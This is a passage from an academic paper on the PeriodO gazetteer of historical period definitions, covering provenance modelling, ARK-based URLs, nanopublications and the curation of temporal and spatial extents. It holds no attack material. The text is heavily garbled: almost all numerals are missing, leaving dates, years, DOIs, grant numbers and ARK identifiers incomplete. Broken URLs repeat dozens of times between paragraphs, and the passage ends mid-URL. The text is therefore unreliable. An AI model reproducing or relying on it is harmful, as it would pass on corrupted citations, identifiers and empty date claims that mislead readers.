natural language to parameterized curves, we prefer to maintain the original natural language terms used. however if scholars begin defining periods with parameterized curves (which is certainly possible) then we will revisit this decision. modeling provenance to model the provenance of period assertions, we used the provenance ontology (mcguin- ness, lebo & sahoo, ). we record each change to the dataset (a patch) as a prov:activity. this activity has prov:startedattime and prov:endedattime values representing timestamps when the patch was sent and accepted, respectively. the activity additionally has two prov:used statements: one which refers to the specific version of the entire dataset to which the patch was applied (for example, http://n t. net/ark:/ /p d?version= ), and one referring to the patch itself as a prov:entity. the patch entity contains a url to the json-patch file which resulted in the change activity (nottingham & bryan, ). finally, the activity has prov:generated statements for each of the period collections and period assertions (implied to be of the type prov:entity) that were affected by the given patch. each of these affected entities has a prov:specializationof statement that refers to the permanent identifier for the period assertion or collection (with no particular version specified). if the affected entities are revisions of an existing entity, they have prov:wasrevisionof statements that refer to the version that they were descended from. we publish a changelog at http://n t.net/ark:/ /p h#changelog that represents the sequential list of prov:activity entities that created the current version of the dataset as an ordered rdf list. in this way, one can reconstruct the origin of each change to the dataset as a whole, or to individual period assertions. minting long-term urls in addition to mapping relationships to well-known vocabularies, interpreting periodo as linked data requires a way to assign urls to period collections and definitions. as shown in fig. , period definitions and period collections in the dataset are given short identifiers: p xc mvjx identifies the definition of the classical iberian period, and p xc m identifies the collection to which it belongs. but these identifiers are only useful golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p d?version= http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://n t.net/ark:/ /p h#changelog http://dx.doi.org/ . /peerj-cs. within the context of the periodo dataset; they are not guaranteed to be unique in a global context and, unless one already has the periodo data, one cannot resolve them to obtain representations of the entities they identify. urls, on the other hand, are globally unique and can be resolved using http to obtain representations; this is the core concept behind linked data. so, we need a way to turn the short periodo identifiers into urls. to turn periodo identifiers into urls we rely on the ark identifier scheme (starr et al., ) provided by the california digital library (cdl). first, we include in the json-ld context a @base value specifying the base uri (http://n t.net/ark:/ /p ) to use when interpreting the periodo dataset as linked data. this allows the short periodo identifiers to be interpreted as urls; for example p xc mvjx is interpreted as a relative reference to the url http://n t.net/ark:/ /p xc mvjx . the hostname of this url (n t.net) is the registered name of the cdl’s name-to-thing resolver, which is similar to other name resolution services for persistent urls such as purl. we have registered with the ezid service a single ark identifier (ark:/ /p ), providing them with the url of the http server currently hosting the canonical periodo dataset. thus any request to a url starting with http://n t.net/ark:/ /p will be redirected to that server. an http get to http://n t.net/ark:/ /p d.jsonld will return the entire dataset, while getting (for example) http://n t.net/ark:/ /p xc mvjx .jsonld will return a json-ld representation of belarte’s definition of the “classical iberian period.” period assertions as nanopublications we created the periodo dataset based on the same core concerns of nanopublication authors: to extract, curate, and publish small, computable concepts from their broader sources while still preserving their provenance. a nanopublication is made up of an assertion, the provenance of that assertion, and the provenance of the nanopublication itself. in periodo, these are: • assertion: the definition of a period. • provenance: the source this period was derived from. this may be a citation of a printed work or a url for a resource hosted on the web. • provenance of nanopublication: the history of the period definition within the periodo system, including the date it was added or changed, the identity of the person who submitted or changed it, and the identity of the person who approved additions or changes. figure shows two period definitions with the same provenance. each of these definitions is represented by an individual nanopublication. the nanopublication for the “early iberian period” is shown in fig. . while periodo period definitions readily map to the nanopublication scheme, we faced several challenges during our creation of the dataset due to its interpretive nature. the unfalsifiable nature of time period definitions the current version of the nanopublication guidelines includes a note suggesting that the guidelines be amended to state that an assertion published as a nanopublication should be golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p xc mvjx http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p d.jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://n t.net/ark:/ /p xc mvjx .jsonld http://dx.doi.org/ . /peerj-cs. figure nanopublication of belarte ( )’s definition of the “early iberian period”. “a proposition that is falsifiable, that is to say we can test whether the proposition is true or false” (groth et al., ). were this amendment to be made, periodo nanopublications would be in violation of the guidelines, as period definitions in periodo, like most of the information produced in the humanities, are neither testable nor falsifiable. consider the golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. assertion “there is a period called the late bronze age in northern europe, and it lasted from about b.c. to b.c.” the “late bronze age” is a purely discursive construct. there was no discrete entity called the “late bronze age” before it was named by those studying that time and place. consequently, one cannot disprove the idea that there was a time period called the “late bronze age” from around b.c. to b.c.; one can only argue that another definition has more credence based on non-experimental, discursive arguments. the proposed falsifiability requirement makes sense in certain contexts. computational biologists, for example, wish to connect, consolidate, and assess trillions of measurements scattered throughout a rapidly growing body of research findings. their goal is to create a global, connected knowledge graph that can be used as a tool for scientists to guide new discoveries and verify experimental results. in the periodo context, however, we are not concerned with making an exhaustive taxonomy of “correct” periods or facilitating the “discovery” of new periods (a non sequitur—there are no periods that exist in the world that are awaiting discovery by some inquiring historian or archaeologist). instead we are interested in enabling the study and citation of how and by whom time has been segmented into different periods. it is not necessary that these segmentations be falsifiable to achieve this goal; they only need to be comparable. kuhn et al. ( ) expressed concern that requiring formal representation for all scientific data published as nanopublications “seems to be unrealistic in many cases and might restrict the range of practical application considerably.” similarly, requiring assertions to be unambiguous and falsifiable would unnecessarily restrict the practical application of nanopublication. the nature of nanopublication assertions should ultimately be determined by the practical needs of the researchers who use them. what is important about nanopublications is not the nature of the assertions, but the expression of provenance. provenance is particularly important for non-scientific datasets, since the assertions made are so dependent on their wider discursive context. when assertions cannot be tested experimentally, understanding context is critical for judging quality, trustworthiness, and usefulness. the critical role of curation another difference between the periodo dataset and traditional nanopublications is the unavoidable curatorial work necessary to extract practically useful assertions from textual period definitions. in all of the applications of nanopublications we found, the published assertions typically appeared in the form of measurements or well-defined relationships between discrete entities. these are types of data which humans or computers can easily and reliably extract from research findings. our dataset, in contrast, required explicit curatorial decisions: a time period exists within a certain spatiotemporal context, and there is no sure way to discretely, accurately, and unambiguously model such boundaries. while a human might be able to have a nuanced understanding of temporary and ever-shifting political boundaries or the uncertain and partially arbitrary precision suggested by “around the beginning of the th century bc,” we cannot assume the same of computers. golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. therefore, in order for our dataset to be readily algorithmically comparable, we had to map discursive concepts to discrete values. our curatorial decisions in this regard reflect a compromise between uniformity, potential semantic expressiveness, and practical usefulness. as humanities scholars publish their own nanopublications (or linked data in general), they will go through similar curatorial processes due to the interpretive, unstandardized nature of humanities datasets discussed above. there is a temptation in this process to imagine perfect structured descriptions that could express all possible nuances of all possible assertions. however, chasing that goal can lead to overcomplexity and, in the end, be practically useless. in describing period assertions as linked data, we adopted a schema that was only as semantically complicated as was (a) expressed in our collected data and (b) necessitated by the practical needs of our intended users. as we started to collect data, we considered the basic characteristics of a dataset that would be necessary to accomplish the retrieval and comparison tasks that our intended users told us were most important. these tasks included: • finding how the definition of periods have differed across time/authors, or finding contested period definitions. (“how have different authors defined the early bronze age?”) • finding all periods within a certain span of time. (“what time periods have been used to describe years between ad to ad?”). • finding all periods within a certain geographic area. (“what time periods have scholars used in northern europe?”) • finding periods defined for different languages. (“what time periods have been defined in ukranian?”) figure shows how these various tasks can be completed using the faceted browsing in- terface to the periodo dataset. implementing this interface required imposing consistency upon how we represented the temporal and spatial coverage of period definitions, even though this consistency does not exist in the original sources. our initial approach to imposing consistency on temporal extents was to express the termini of periods as julian days represented in scientific notation. julian days are a standard form of time measurement commonly used by astronomers to represent dates in the far historical past. julian days work by counting the number of continuous days that have passed since january , bc in the proleptic julian calendar. conceptually, this is a similar measurement to the common unix time standard, which counts the number of milliseconds that have passed since midnight gmt on january , . the idea is that by counting forward using well-defined units since an accepted epoch, one can escape the inconsistencies and periodic lapses that characterize different calendrical systems. representing julian days using scientific notation allows one to express variable levels of uncertainty. see examples of this notation system in table . however, in practice, we found this scheme to be overly complex. the imposition of a level of uncertainty, while theoretically useful in certain cases, was often not appropriate. golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure finding and comparing period definitions in periodo. searching for “early bronze” ( ) results in sixty period definitions with matching labels ( ), from a variety of sources ( ). the time range facet ( ) updates to show the distribution of temporal extents defined by these various sources. users can query for period definitions with temporal extents within a specific range of years using the time range facet ( ), period definitions with spatial extents within a named geographic area using the spatial coverage facet ( ), or period definitions in specific languages using the language facet ( ). queries may combine values from any of these facets. table example scientific notation of julian days. scientific notation julian day (jdn) proleptic gregorian . e between jdn , , and jdn , , bc ± years . e between jdn , , and jdn , , bc ± years . e between jdn , , and jdn , , bc ± . years in almost every single case that we observed, authors did not explicitly state a precise level of uncertainty for their temporal expressions. by adding precise uncertainty ourselves, we would, in effect, have been putting words in authors’ mouths. further, julian days are not widely used outside of very specific disciplines, meaning that consumers of our data would have to convert to a more familiar time system before being able to understand or use our data. instead of the julian day model, we settled on the four-part iso date schema, described above. this model is less expressive for complicated forms of uncertainty, but it is less complex and more easily understood by both our target audience and typical software programs. iso dates were simple to convert to, since nearly all of the period assertions we observed were drawn from sources based on western calendars. if and when we encounter period definitions that require more complex time expressions or are based on varying calendrical systems, we will revisit the question of whether the four-part scheme is sufficient. golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure part of the interface for editing period definitions. labels for temporal extent boundaries are taken verbatim from the source, entered as free text, and automatically parsed into iso year representations. labels for spatial coverage are entered as free text, and using an autocompletion interface the user can specify the modern-day administrative units (e.g., nation-states) that approximate this spatial coverage. to encourage a consistent representation of temporal extent for all period definitions, we built a simple grammar and parser for date expressions that covered the vast majority of our sample data. the parser takes in a string like “c. mid- th century” and outputs a json string consistent with our data model. it can also produce naı̈ve interpretations of descriptions like “mid-fifth century,” assigning them to the third of the epoch described according to the conventional segmentation of “early,” “mid,” and “late,” “mid-fifth century” would, then, be parsed as the range of years – . the parser is intended to be used interactively, as a generator of suggestions for standard ways to represent certain forms of time description. to keep the quality of the gazetteer high, we do not intend for the parser to be used to fully automatically “extract” period definitions from texts. similarly, we created an autocomplete interface to modern political entities to allow users to enter spatial coverage. these interface components help curators produce a practical approximation of spatiotemporal coverage rather than a complete, unambiguous representation. the interface we created to allow users to add and edit period definitions is shown in fig. . project status and future work as of late , we have gathered just over , period definitions from sources, including monographs, journal articles, and online databases. each period has been assigned a permanent url, which can be resolved to view its definition and provenance as html, json-ld, or turtle. several projects have begun to use our gazetteer to add spatiotemporal information to their work, including the open context research data repository (http://opencontext.org), the ariadne archaeological research data infrastructure project (http://ariadne-infrastructure.eu), and the portable antiquities scheme database of archaeological finds in the uk (https://finds.org.uk). golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://opencontext.org http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu http://ariadne-infrastructure.eu https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk https://finds.org.uk http://dx.doi.org/ . /peerj-cs. as more projects begin to integrate periodo identifiers for time periods, we hope to gather information on their citation and use. this would include both studying the histor- ical use of attributed period definitions as well as tracking the citation of periodo period identifiers going forward. such a study would allow us to observe how periods come into circulation and fall out of favor. tracing the connections fostered by use of our gazetteer would demonstrate the potential benefits of a linked data approach in the humanities. we are also in the process of reaching out to period-defining communities beyond classical archaeology and ancient history. we expect that this will require some extensions of and revisions to the current periodo data model. first, as we begin to collect definitions of periods closer to the present, we expect to extend our model of temporal extent to allow for more fine-grained interval boundaries than years. this will require a unit of representation that allows comparisons between intervals defined at different levels of granularity. (the approach based on julian days, described in table , may be useful for this.) second, as we begin to include more non-western period definitions, we will need to ensure that we can still map years to iso representations. at the very least, this will require extending the temporal expression parser, and it may require changes to the data model as well, for example to state explicitly the calendar system used by the original authors. finally, as more historians begin publishing their work as datasets or software, we may begin to encounter periods defined not in natural language but using some formalism, such as the curves proposed by kauppinen et al. ( ). these will require us to find a way of including these formalisms directly in our definitions. conclusion as scholars of all disciplines continue to integrate computational methods into their work, the need to preserve provenance will only become more important. this is as true in the humanities and social sciences as it is in the natural sciences. nanopublication is an useful way to locate the production of “data” within a wider scholarly context. in this way, it echoes old ideas about hypertext which were concerned with relations of provenance, authorship, and attribution (nelson, ). the periodo period gazetteer shows that this approach is relevant and feasible even to fields outside of the experimental, observable sciences. additional information and declarations funding this work was generously funded by a digital humanities start-up grant from the national endowment for the humanities (grant number hd- - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national endowment for the humanities: hd- - . golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • patrick golden and ryan shaw conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: periodo dataset: http://n t.net/ark:/ /p . references belarte mc. . domestic architecture and social differences in north-eastern iberia during the iron age (c. – bc). oxford journal of archaeology : – doi . /j. - . . .x. bradley j, short h. . texts into databases: the evolving field of new-style prosopography. literary and linguistic computing (suppl. no. ): – doi . /llc/fqi . buckland m. . description and search: metadata as infrastructure. brazilian journal of information science ( ): – . available at http://www .marilia.unesp.br/revistas/index.php/ bjis/article/viewarticle/ . carothers g, prud’hommeaux e. . rdf . turtle. w c recommendation, w c. available at http://www.w .org/tr/ /rec-turtle- /. eisenstein e. . the printing press as an agent of change: communications and cultural transformations in early-modern europe. cambridge: cambridge university press. elliott t, gillies s. . pleiades: an un-gis for ancient geography. in: digital humanities conference . stanford. available at http://dh abstracts.stanford.edu/xtf/view?docid=tei/ ab- .xml. gillies s. . event-like geojson features using json-ld. available at https://github.com/ geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md. gradmann s. . from containers to content to context. journal of documentation ( ): – doi . /jd- - - . groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services & use ( – ): – doi . /isu- - . groth p, schultes e, thompson m, tatum z, dumontier m. . nanopublication guidelines. in: concept web alliance working draft, concept web alliance. available at http://www.nanopub. org/ /wd-guidelines- /. heath t, bizer c. . linked data: evolving the web into a global data space. synthesis lectures on the semantic web: theory and technology ( ): – doi . /s ed v y wbe . hobbs j, pan f. . time ontology in owl.w c working draft, w c. available at http://www. w .org/tr/ /wd-owl-time- /. golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://n t.net/ark:/ /p http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /llc/fqi http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ http://www 